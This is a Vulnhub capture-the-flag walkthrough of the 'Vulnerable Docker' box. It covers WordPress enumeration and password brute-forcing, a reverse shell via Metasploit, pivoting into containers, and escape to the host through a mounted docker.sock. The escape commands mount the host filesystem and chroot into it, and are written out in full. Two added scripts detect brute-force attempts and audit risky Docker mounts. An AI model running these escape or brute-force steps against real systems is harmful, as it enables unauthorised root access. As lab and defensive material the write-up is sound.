2021-03-26 15:22:10 +05:00

Vulnhub - Vulnerable Docker (Hard)

NMAP

nmap -p- -sC -sV 192.168.1.7

Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 22:24 PKT
Nmap scan report for 192.168.1.7
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
|   2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
|   256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
|_  256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
8000/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.8.15
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: NotSoEasy Docker – Just another WordPress site
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds

PORT 8000 (HTTP)

We can see this is a WordPress site, so let's run wpscan against it.

wpscan found a username, bob; we can now try brute-forcing the password.

Log in with the credentials found.
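For the server-side view of the two steps above (user enumeration followed by password guessing), here is an added detection example; it is not part of the original writeup. It parses Apache combined-format access log lines, which is what the Apache httpd seen on port 8000 would write, and flags the enumeration requests wpscan is known to make (`?author=N` redirects and `/wp-json/wp/v2/users`) as well as bursts of POSTs to `/wp-login.php` from one client. A failed WordPress login answers 200 and re-renders the form; a successful one answers 302, so a 302 after a burst is the "guess succeeded" signal. The log lines are constructed for the example, and the threshold and window are arbitrary defaults.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (not taken from the box): one client
# enumerates users the way wpscan does, then hammers wp-login.php until a
# guess succeeds (a 302 redirect instead of the 200 that re-renders the form).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Mar/2021:22:30:01 +0500] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:02 +0500] "GET /wp-json/wp/v2/users HTTP/1.1" 200 412 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:10 +0500] "POST /wp-login.php HTTP/1.1" 200 2510 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:10 +0500] "POST /wp-login.php HTTP/1.1" 200 2510 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:11 +0500] "POST /wp-login.php HTTP/1.1" 200 2510 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:11 +0500] "POST /wp-login.php HTTP/1.1" 200 2510 "-" "WPScan v3.8"
10.0.0.5 - - [25/Mar/2021:22:30:12 +0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
10.0.0.9 - - [25/Mar/2021:22:31:00 +0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [25/Mar/2021:22:31:05 +0500] "GET /wp-admin/ HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Requests wpscan uses to discover usernames: author-ID redirects and the REST users endpoint.
ENUM_RE = re.compile(r'[?&]author=\d+|/wp-json/wp/v2/users')


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def peak_in_window(times, window):
    """Largest number of timestamps that fall inside any span of `window` seconds."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(log_text, threshold=5, window=60):
    """Return enumerating IPs, IPs exceeding `threshold` login POSTs per `window`,
    and which of those also got a 302 (a guess that probably succeeded)."""
    enumeration = set()
    login_posts = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ENUM_RE.search(ev["path"]):
            enumeration.add(ev["ip"])
        if ev["method"] == "POST" and ev["path"].split("?")[0] == "/wp-login.php":
            login_posts[ev["ip"]].append((ev["ts"], ev["status"]))

    bruteforce, suspected_success = {}, set()
    for ip, events in login_posts.items():
        peak = peak_in_window([ts for ts, _ in events], window)
        if peak >= threshold:
            bruteforce[ip] = peak
            if any(status == 302 for _, status in events):
                suspected_success.add(ip)
    return {"enumeration": enumeration,
            "bruteforce": bruteforce,
            "suspected_success": suspected_success}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The single legitimate login from 10.0.0.9 also returns 302 but is not reported, because the rule requires a burst first; tuning the threshold to the site's real traffic is what keeps this usable.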

Now we can either manually upload a PHP reverse shell or use a Metasploit exploit.

We didn't get a proper Meterpreter shell because of the web shell exploit we used, so we need to generate a Linux payload, upload it and execute it on the target machine.

Open another Meterpreter window and configure the listener.

Now commands can be run properly.

Use Metasploit's autoroute to pivot through the compromised host.

Now we need to find what's running on the Docker container, so we can use Metasploit's auxiliary/scanner/portscan/tcp module.

In order to access the ports we found we need to use proxychains; for that we run the SOCKS module on Metasploit and use FoxyProxy to configure the proxy for the browser.

Verify that the port is added in /etc/proxychains.conf.

We can find docker.sock on the container, which means we can create another container with the host machine's file system mounted on it.

But to get a static binary onto that container there is no utility to download a file. We do have internet available on the machine, so we can download docker as well; before that, I installed python3 on the container so I could get a stabilized shell.

Run apt update and then apt install python3.

Download the static docker binary and transfer it to the target machine.

Since we have docker.sock on our container, we can list the images being used:

./docker -H unix:///var/run/docker.sock images

Now mount the host file system inside a new container and chroot into it:

./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host
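The two docker commands above work only because the daemon socket was bind-mounted into a container, and the second one creates a container with the host's root bind-mounted. As a defensive counterpart, here is an added example that is not part of the original writeup: a script that audits `docker inspect` output for exactly those conditions (socket mounted into a container, host `/` bind-mounted, `--privileged`). The JSON sample is constructed for the example, with made-up container names; the field names (`Name`, `HostConfig.Privileged`, `Mounts[].Type/Source/Destination/RW`) follow the real `docker inspect` schema.

```python
import json
import sys

# Constructed sample in the shape `docker inspect <id> ...` emits (a JSON list
# with one object per container). Names and paths are made up for this example.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "HostConfig": {"Privileged": False},
        "Mounts": [
            {"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
             "Destination": "/var/www/html", "RW": True},
        ],
    },
    {
        "Name": "/jumpbox",
        "HostConfig": {"Privileged": False},
        "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock",
             "Destination": "/var/run/docker.sock", "RW": False},
        ],
    },
    {
        "Name": "/suspect",
        "HostConfig": {"Privileged": True},
        "Mounts": [
            {"Type": "bind", "Source": "/", "Destination": "/host", "RW": True},
        ],
    },
])

# Host paths at which the Docker daemon usually listens.
DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}


def audit_container(c):
    """Return a list of (code, detail) findings for one `docker inspect` record."""
    findings = []
    name = c.get("Name", "?").lstrip("/")
    if c.get("HostConfig", {}).get("Privileged"):
        findings.append(("PRIVILEGED", f"{name}: runs with --privileged"))
    for m in c.get("Mounts", []):
        if m.get("Type") != "bind":
            continue  # named volumes live under /var/lib/docker, not arbitrary host paths
        src, dst = m.get("Source", ""), m.get("Destination", "")
        if src in DOCKER_SOCKETS:
            # RW=False does not help here: connect() on a read-only bind mount of a
            # unix socket still works, so the container gets the full daemon API.
            findings.append(("DOCKER_SOCKET", f"{name}: daemon socket mounted at {dst}"))
        elif src == "/":
            mode = "rw" if m.get("RW") else "ro"
            findings.append(("HOST_ROOT_MOUNT",
                             f"{name}: host / bind-mounted at {dst} ({mode})"))
    return findings


def audit_inspect_json(text):
    """Audit `docker inspect` JSON and return {container_name: [findings]} for offenders only."""
    report = {}
    for c in json.loads(text):
        findings = audit_container(c)
        if findings:
            report[c.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    # Reads real inspect output from stdin when piped; otherwise runs on the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_INSPECT
    for name, findings in audit_inspect_json(text).items():
        for code, detail in findings:
            print(f"[{code}] {detail}")
```

Run it against a live host with `docker inspect $(docker ps -q) | python3 audit_mounts.py` (file name assumed). Any `DOCKER_SOCKET` hit is equivalent to root on the host for whoever gets code execution in that container, which is the whole chain this box demonstrates; the only reliable fix is not mounting the socket into containers at all, since a read-only mount does not restrict the API.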

Add your generated SSH public key to root's authorized_keys and then SSH into the box as root.